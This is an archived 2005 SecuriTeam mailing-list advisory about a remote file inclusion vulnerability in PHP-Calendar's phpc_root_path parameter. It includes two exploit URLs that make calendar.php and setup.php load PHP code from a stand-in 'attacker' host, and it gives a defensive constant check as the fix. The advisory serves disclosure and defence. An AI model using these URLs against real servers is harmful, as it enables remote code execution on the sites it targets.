[UNIX] PHP-Calendar File Inclusion Vulnerability (phpc_root_path)
From: SecuriTeam (support_at_securiteam.com)
Date: 01/10/05
- Previous message: SecuriTeam: "[UNIX] WPkontakt Message Parsing Error"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 10 Jan 2005 15:37:12 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
PHP-Calendar File Inclusion Vulnerability (phpc_root_path)
------------------------------------------------------------------------
SUMMARY
<http://php-calendar.sourceforge.net/> PHP-Calendar is "a PHP based
calendaring program". Due to insufficient filtering of user provided data
by PHP-Calendar, a remote attacker can cause the program to include
arbitrary PHP files (external to the web site) and execute the code found
in them.
DETAILS
Exploit:
http://path/includes/calendar.php?phpc_root_path=http://attacker/includes/html.php
http://path/includes/setup.php?phpc_root_path=http://attacker/includes/html.php
If PHP globals are set to on then it is highly probable that an attacker
will be able to include arbitrary php files and thus execute system
commands with the rights of the web server.
Solution:
PHP-Calendar has a defined constant to help prevent against stuff like
this. It can be seen in other php-calendar files such as db.php
if ( !defined('IN_PHPC') ) {
die("Hacking attempt");
}
Adding the following to the top of the affected pages should suffice in
preventing the kinds of attacks previously mentioned in this advisory.
ADDITIONAL INFORMATION
The information has been provided by <mailto:security@gulftech.org>
GulfTech Security.
The original article can be found at:
<http://www.gulftech.org/?node=research&article_id=00060-12292004>
http://www.gulftech.org/?node=research&article_id=00060-12292004
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] WPkontakt Message Parsing Error"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
